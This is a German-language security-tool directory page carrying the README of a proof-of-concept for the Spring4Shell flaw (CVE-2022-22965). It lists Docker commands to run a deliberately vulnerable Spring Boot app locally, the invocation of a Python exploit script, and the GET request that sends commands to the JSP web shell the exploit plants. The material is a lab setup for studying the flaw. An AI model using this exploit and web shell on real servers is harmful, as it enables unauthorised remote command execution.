Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-22965 | Kitploit
Tools/GitHubGitHub/mariomamo/cve-2022-22965
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmariomamo/cve-2022-22965

CVE-2022-22965

Repository anzeigen
51vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

👾 CVE-2022-22965

Dies ist ein Proof of Concept eines Exploits für die Sicherheitslücke CVE-2022-22965 (spring4shell). Es besteht aus:

  • Einer verwundbaren Springboot-Anwendung;
  • Einem in Python geschriebenen Exploit-Skript;
  • Einer sicheren App zum Testen, dass der Exploit nicht funktioniert;
  • Einem Dockerfile zum Ausführen der verwundbaren Anwendung und Testen des Exploits;

🔧Mitwirkende

  • [🇮🇹] Mario Offertucci;
  • [🇮🇹] Antonio Donnarumma.

⚙️ Voraussetzungen

  • Docker: Es wird zum Ausführen eines Tomcat-Containers mit der Springboot-Anwendung verwendet;
  • Python: Es wird zum Ausführen des Exploits verwendet;

1️⃣ Ausführen der Springboot-Anwendung

Im Projektstammordner befindet sich ein Dockerfile, das ein Tomcat-Image erstellt und die Dateien vulnerable_app/target/spring4shell.war und safe_app/target/safeapp.war in den Ordner /usr/local/tomcat/webapps kopiert. Du musst also nur das Image erstellen und den Container starten.

Das Tomcat-Image erstellen

root@kitploit:~
docker build -t cve_2022_22965 .

Den Container starten

root@kitploit:~
docker run -p 8080:8080 -d --name springshell cve_2022_22965

Prüfen, ob die Anwendung antwortet

root@kitploit:~
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

Wenn du diese Antwort siehst

root@kitploit:~
This is Elliot Alderson

Dann ist die Anwendung gestartet und läuft.

2️⃣ Jetzt kannst du den Exploit ausführen

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

Du kannst optional den Namen der injizierten JSP-Datei angeben, das ist aber nicht erforderlich. Beispiel

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

Wenn du keinen Namen angibst, wird ein zufälliger generiert.

Du wirst Folgendes in der Kommandozeile sehen
Nach dem Exploit kannst du einen Befehl auch über eine HTTP-GET-Anfrage senden

root@kitploit:~
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

Du hast erfolgreich eine Shell auf dem Opfercomputer geöffnet! Viel Spaß!

Tool herunterladen